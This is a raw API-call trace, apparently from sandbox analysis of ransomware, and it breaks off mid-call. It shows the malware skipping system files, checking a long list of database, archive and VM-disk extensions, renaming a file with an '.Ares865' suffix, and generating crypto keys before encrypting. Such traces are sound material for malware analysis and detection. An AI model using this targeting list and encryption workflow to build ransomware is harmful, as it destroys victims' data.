[0088.545] CloseHandle (hObject=0x15c) returned 1 [0088.545] CloseHandle (hObject=0x118) returned 1 [0088.545] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.545] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.545] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.546] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb31c100, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xcb31c100, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x115b60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WWINTL.REST.trx_dll", cAlternateFileName="WWINTL~2.TRX")) returned 1 [0088.546] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.546] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0088.546] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2=".") returned 1 [0088.546] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="..") returned 1 [0088.546] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="windows") returned 1 [0088.546] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="bootmgr") returned 1 [0088.546] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="temp") returned 1 [0088.546] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="pagefile.sys") returned 1 [0088.546] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="boot") returned 1 [0088.546] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="ids.txt") returned 1 [0088.546] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0088.546] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="perflogs") returned 1 [0088.546] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="MSBuild") returned 1 [0088.546] lstrlenW (lpString="WWINTL.REST.trx_dll") returned 19 [0088.546] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll") returned 70 [0088.546] lstrcpyW (in: lpString1=0x2cce468, lpString2="WWINTL.REST.trx_dll" | out: lpString1="WWINTL.REST.trx_dll") returned="WWINTL.REST.trx_dll" [0088.546] lstrlenW (lpString="WWINTL.REST.trx_dll") returned 19 [0088.546] lstrlenW (lpString="Ares865") returned 7 [0088.546] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0088.546] lstrlenW (lpString=".dll") returned 4 [0088.546] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2=".dll") returned 1 [0088.546] lstrlenW (lpString=".lnk") returned 4 [0088.546] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2=".lnk") returned 1 [0088.546] lstrlenW (lpString=".ini") returned 4 [0088.546] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2=".ini") returned 1 [0088.546] lstrlenW (lpString=".sys") returned 4 [0088.546] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2=".sys") returned 1 [0088.547] lstrlenW (lpString="WWINTL.REST.trx_dll") returned 19 [0088.547] lstrlenW (lpString="bak") returned 3 [0088.547] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0088.547] lstrlenW (lpString="ba_") returned 3 [0088.547] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0088.547] lstrlenW (lpString="dbb") returned 3 [0088.547] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0088.547] lstrlenW (lpString="vmdk") returned 4 [0088.547] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0088.547] lstrlenW (lpString="rar") returned 3 [0088.547] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0088.547] lstrlenW (lpString="zip") returned 3 [0088.547] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0088.547] lstrlenW (lpString="tgz") returned 3 [0088.547] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0088.547] lstrlenW (lpString="vbox") returned 4 [0088.547] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0088.547] lstrlenW (lpString="vdi") returned 3 [0088.547] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0088.547] lstrlenW (lpString="vhd") returned 3 [0088.547] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0088.547] lstrlenW (lpString="vhdx") returned 4 [0088.547] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0088.547] lstrlenW (lpString="avhd") returned 4 [0088.547] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0088.547] lstrlenW (lpString="db") returned 2 [0088.547] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0088.547] lstrlenW (lpString="db2") returned 3 [0088.547] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0088.547] lstrlenW (lpString="db3") returned 3 [0088.547] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0088.547] lstrlenW (lpString="dbf") returned 3 [0088.547] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0088.547] lstrlenW (lpString="mdf") returned 3 [0088.547] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0088.547] lstrlenW (lpString="mdb") returned 3 [0088.547] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0088.547] lstrlenW (lpString="sql") returned 3 [0088.548] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0088.548] lstrlenW (lpString="sqlite") returned 6 [0088.548] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0088.548] lstrlenW (lpString="sqlite3") returned 7 [0088.548] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0088.548] lstrlenW (lpString="sqlitedb") returned 8 [0088.548] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0088.548] lstrlenW (lpString="xml") returned 3 [0088.548] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0088.548] lstrlenW (lpString="$er") returned 3 [0088.548] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0088.548] lstrlenW (lpString="4dd") returned 3 [0088.548] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0088.548] lstrlenW (lpString="4dl") returned 3 [0088.548] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0088.548] lstrlenW (lpString="^^^") returned 3 [0088.548] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0088.548] lstrlenW (lpString="abs") returned 3 [0088.548] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0088.548] lstrlenW (lpString="abx") returned 3 [0088.548] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0088.548] lstrlenW (lpString="accdb") returned 5 [0088.548] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0088.548] lstrlenW (lpString="accdc") returned 5 [0088.548] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0088.548] lstrlenW (lpString="accde") returned 5 [0088.548] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0088.548] lstrlenW (lpString="accdr") returned 5 [0088.548] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0088.548] lstrlenW (lpString="accdt") returned 5 [0088.548] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0088.548] lstrlenW (lpString="accdw") returned 5 [0088.548] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0088.548] lstrlenW (lpString="accft") returned 5 [0088.548] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0088.548] lstrlenW (lpString="adb") returned 3 [0088.548] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.549] lstrlenW (lpString="adb") returned 3 [0088.549] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.549] lstrlenW (lpString="ade") returned 3 [0088.549] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0088.549] lstrlenW (lpString="adf") returned 3 [0088.549] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0088.549] lstrlenW (lpString="adn") returned 3 [0088.549] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0088.549] lstrlenW (lpString="adp") returned 3 [0088.549] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0088.549] lstrlenW (lpString="alf") returned 3 [0088.549] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0088.549] lstrlenW (lpString="ask") returned 3 [0088.549] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0088.549] lstrlenW (lpString="btr") returned 3 [0088.549] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0088.549] lstrlenW (lpString="cat") returned 3 [0088.549] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0088.549] lstrlenW (lpString="cdb") returned 3 [0088.549] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0088.549] lstrlenW (lpString="ckp") returned 3 [0088.549] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0088.549] lstrlenW (lpString="cma") returned 3 [0088.549] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0088.549] lstrlenW (lpString="cpd") returned 3 [0088.549] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0088.549] lstrlenW (lpString="dacpac") returned 6 [0088.549] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0088.549] lstrlenW (lpString="dad") returned 3 [0088.549] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0088.549] lstrlenW (lpString="dadiagrams") returned 10 [0088.549] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0088.549] lstrlenW (lpString="daschema") returned 8 [0088.549] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0088.549] lstrlenW (lpString="db-journal") returned 10 [0088.549] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0088.549] lstrlenW (lpString="db-shm") returned 6 [0088.549] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0088.550] lstrlenW (lpString="db-wal") returned 6 [0088.550] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0088.550] lstrlenW (lpString="dbc") returned 3 [0088.550] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0088.550] lstrlenW (lpString="dbs") returned 3 [0088.550] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0088.550] lstrlenW (lpString="dbt") returned 3 [0088.550] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0088.550] lstrlenW (lpString="dbv") returned 3 [0088.550] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0088.550] lstrlenW (lpString="dbx") returned 3 [0088.550] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0088.550] lstrlenW (lpString="dcb") returned 3 [0088.550] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0088.550] lstrlenW (lpString="dct") returned 3 [0088.550] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0088.550] lstrlenW (lpString="dcx") returned 3 [0088.550] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0088.550] lstrlenW (lpString="ddl") returned 3 [0088.550] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0088.550] lstrlenW (lpString="dlis") returned 4 [0088.550] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0088.550] lstrlenW (lpString="dp1") returned 3 [0088.550] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0088.550] lstrlenW (lpString="dqy") returned 3 [0088.550] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0088.550] lstrlenW (lpString="dsk") returned 3 [0088.550] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0088.550] lstrlenW (lpString="dsn") returned 3 [0088.550] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0088.550] lstrlenW (lpString="dtsx") returned 4 [0088.550] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0088.550] lstrlenW (lpString="dxl") returned 3 [0088.550] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0088.550] lstrlenW (lpString="eco") returned 3 [0088.550] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0088.550] lstrlenW (lpString="ecx") returned 3 [0088.551] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0088.551] lstrlenW (lpString="edb") returned 3 [0088.551] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0088.551] lstrlenW (lpString="epim") returned 4 [0088.551] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0088.551] lstrlenW (lpString="fcd") returned 3 [0088.551] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0088.551] lstrlenW (lpString="fdb") returned 3 [0088.551] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0088.551] lstrlenW (lpString="fic") returned 3 [0088.551] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0088.551] lstrlenW (lpString="flexolibrary") returned 12 [0088.551] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0088.551] lstrlenW (lpString="fm5") returned 3 [0088.551] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0088.551] lstrlenW (lpString="fmp") returned 3 [0088.551] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0088.551] lstrlenW (lpString="fmp12") returned 5 [0088.551] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0088.551] lstrlenW (lpString="fmpsl") returned 5 [0088.551] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0088.551] lstrlenW (lpString="fol") returned 3 [0088.551] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0088.551] lstrlenW (lpString="fp3") returned 3 [0088.551] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0088.551] lstrlenW (lpString="fp4") returned 3 [0088.551] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0088.551] lstrlenW (lpString="fp5") returned 3 [0088.551] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0088.551] lstrlenW (lpString="fp7") returned 3 [0088.551] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0088.551] lstrlenW (lpString="fpt") returned 3 [0088.551] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0088.551] lstrlenW (lpString="frm") returned 3 [0088.551] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0088.551] lstrlenW (lpString="gdb") returned 3 [0088.551] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.551] lstrlenW (lpString="gdb") returned 3 [0088.552] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.552] lstrlenW (lpString="grdb") returned 4 [0088.552] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0088.552] lstrlenW (lpString="gwi") returned 3 [0088.552] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0088.552] lstrlenW (lpString="hdb") returned 3 [0088.552] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0088.552] lstrlenW (lpString="his") returned 3 [0088.552] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0088.552] lstrlenW (lpString="ib") returned 2 [0088.552] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0088.552] lstrlenW (lpString="idb") returned 3 [0088.552] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0088.552] lstrlenW (lpString="ihx") returned 3 [0088.552] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0088.552] lstrlenW (lpString="itdb") returned 4 [0088.552] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0088.552] lstrlenW (lpString="itw") returned 3 [0088.552] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0088.552] lstrlenW (lpString="jet") returned 3 [0088.552] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0088.552] lstrlenW (lpString="jtx") returned 3 [0088.552] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0088.552] lstrlenW (lpString="kdb") returned 3 [0088.552] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0088.552] lstrlenW (lpString="kexi") returned 4 [0088.552] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0088.552] lstrlenW (lpString="kexic") returned 5 [0088.552] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0088.552] lstrlenW (lpString="kexis") returned 5 [0088.552] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0088.552] lstrlenW (lpString="lgc") returned 3 [0088.552] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0088.552] lstrlenW (lpString="lwx") returned 3 [0088.552] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0088.552] lstrlenW (lpString="maf") returned 3 [0088.552] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0088.552] lstrlenW (lpString="maq") returned 3 [0088.553] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0088.553] lstrlenW (lpString="mar") returned 3 [0088.553] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0088.553] lstrlenW (lpString="marshal") returned 7 [0088.553] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0088.553] lstrlenW (lpString="mas") returned 3 [0088.553] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0088.553] lstrlenW (lpString="mav") returned 3 [0088.553] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0088.553] lstrlenW (lpString="maw") returned 3 [0088.553] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0088.553] lstrlenW (lpString="mdbhtml") returned 7 [0088.553] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0088.553] lstrlenW (lpString="mdn") returned 3 [0088.553] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0088.553] lstrlenW (lpString="mdt") returned 3 [0088.553] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0088.553] lstrlenW (lpString="mfd") returned 3 [0088.553] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0088.553] lstrlenW (lpString="mpd") returned 3 [0088.553] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0088.553] lstrlenW (lpString="mrg") returned 3 [0088.553] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0088.553] lstrlenW (lpString="mud") returned 3 [0088.553] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0088.553] lstrlenW (lpString="mwb") returned 3 [0088.553] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0088.553] lstrlenW (lpString="myd") returned 3 [0088.553] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0088.553] lstrlenW (lpString="ndf") returned 3 [0088.553] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0088.553] lstrlenW (lpString="nnt") returned 3 [0088.553] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0088.553] lstrlenW (lpString="nrmlib") returned 6 [0088.553] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0088.553] lstrlenW (lpString="ns2") returned 3 [0088.553] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0088.554] lstrlenW (lpString="ns3") returned 3 [0088.554] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0088.554] lstrlenW (lpString="ns4") returned 3 [0088.554] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0088.554] lstrlenW (lpString="nsf") returned 3 [0088.554] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0088.554] lstrlenW (lpString="nv") returned 2 [0088.554] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0088.554] lstrlenW (lpString="nv2") returned 3 [0088.554] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0088.554] lstrlenW (lpString="nwdb") returned 4 [0088.554] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0088.554] lstrlenW (lpString="nyf") returned 3 [0088.554] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0088.554] lstrlenW (lpString="odb") returned 3 [0088.554] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.554] lstrlenW (lpString="odb") returned 3 [0088.554] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.554] lstrlenW (lpString="oqy") returned 3 [0088.554] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0088.554] lstrlenW (lpString="ora") returned 3 [0088.554] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0088.554] lstrlenW (lpString="orx") returned 3 [0088.554] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0088.554] lstrlenW (lpString="owc") returned 3 [0088.554] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0088.554] lstrlenW (lpString="p96") returned 3 [0088.554] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0088.554] lstrlenW (lpString="p97") returned 3 [0088.554] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0088.554] lstrlenW (lpString="pan") returned 3 [0088.554] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0088.554] lstrlenW (lpString="pdb") returned 3 [0088.554] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0088.554] lstrlenW (lpString="pdm") returned 3 [0088.554] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0088.554] lstrlenW (lpString="pnz") returned 3 [0088.554] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0088.555] lstrlenW (lpString="qry") returned 3 [0088.555] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0088.555] lstrlenW (lpString="qvd") returned 3 [0088.555] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0088.555] lstrlenW (lpString="rbf") returned 3 [0088.555] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0088.555] lstrlenW (lpString="rctd") returned 4 [0088.555] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0088.555] lstrlenW (lpString="rod") returned 3 [0088.555] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0088.555] lstrlenW (lpString="rodx") returned 4 [0088.555] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0088.555] lstrlenW (lpString="rpd") returned 3 [0088.555] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0088.555] lstrlenW (lpString="rsd") returned 3 [0088.555] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0088.555] lstrlenW (lpString="sas7bdat") returned 8 [0088.555] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0088.555] lstrlenW (lpString="sbf") returned 3 [0088.555] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0088.555] lstrlenW (lpString="scx") returned 3 [0088.555] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0088.555] lstrlenW (lpString="sdb") returned 3 [0088.555] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0088.555] lstrlenW (lpString="sdc") returned 3 [0088.555] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0088.555] lstrlenW (lpString="sdf") returned 3 [0088.555] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0088.555] lstrlenW (lpString="sis") returned 3 [0088.555] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0088.555] lstrlenW (lpString="spq") returned 3 [0088.555] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0088.556] lstrlenW (lpString="te") returned 2 [0088.556] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0088.556] lstrlenW (lpString="teacher") returned 7 [0088.556] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0088.556] lstrlenW (lpString="tmd") returned 3 [0088.556] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0088.556] lstrlenW (lpString="tps") returned 3 [0088.556] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0088.556] lstrlenW (lpString="trc") returned 3 [0088.556] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.556] lstrlenW (lpString="trc") returned 3 [0088.556] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.556] lstrlenW (lpString="trm") returned 3 [0088.556] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0088.556] lstrlenW (lpString="udb") returned 3 [0088.556] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0088.556] lstrlenW (lpString="udl") returned 3 [0088.556] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0088.556] lstrlenW (lpString="usr") returned 3 [0088.556] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0088.556] lstrlenW (lpString="v12") returned 3 [0088.556] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0088.556] lstrlenW (lpString="vis") returned 3 [0088.556] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0088.556] lstrlenW (lpString="vpd") returned 3 [0088.556] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0088.556] lstrlenW (lpString="vvv") returned 3 [0088.556] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0088.556] lstrlenW (lpString="wdb") returned 3 [0088.556] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0088.556] lstrlenW (lpString="wmdb") returned 4 [0088.556] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0088.556] lstrlenW (lpString="wrk") returned 3 [0088.556] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0088.556] lstrlenW (lpString="xdb") returned 3 [0088.556] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0088.556] lstrlenW (lpString="xld") returned 3 [0088.557] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0088.557] lstrlenW (lpString="xmlff") returned 5 [0088.557] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0088.557] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll.Ares865") returned 79 [0088.557] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0088.557] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.558] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1137504) returned 1 [0088.558] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.558] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.558] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.558] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.559] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.559] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.559] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x115e60, lpName=0x0) returned 0x15c [0088.560] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x115e60) returned 0x3030000 [0088.616] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: 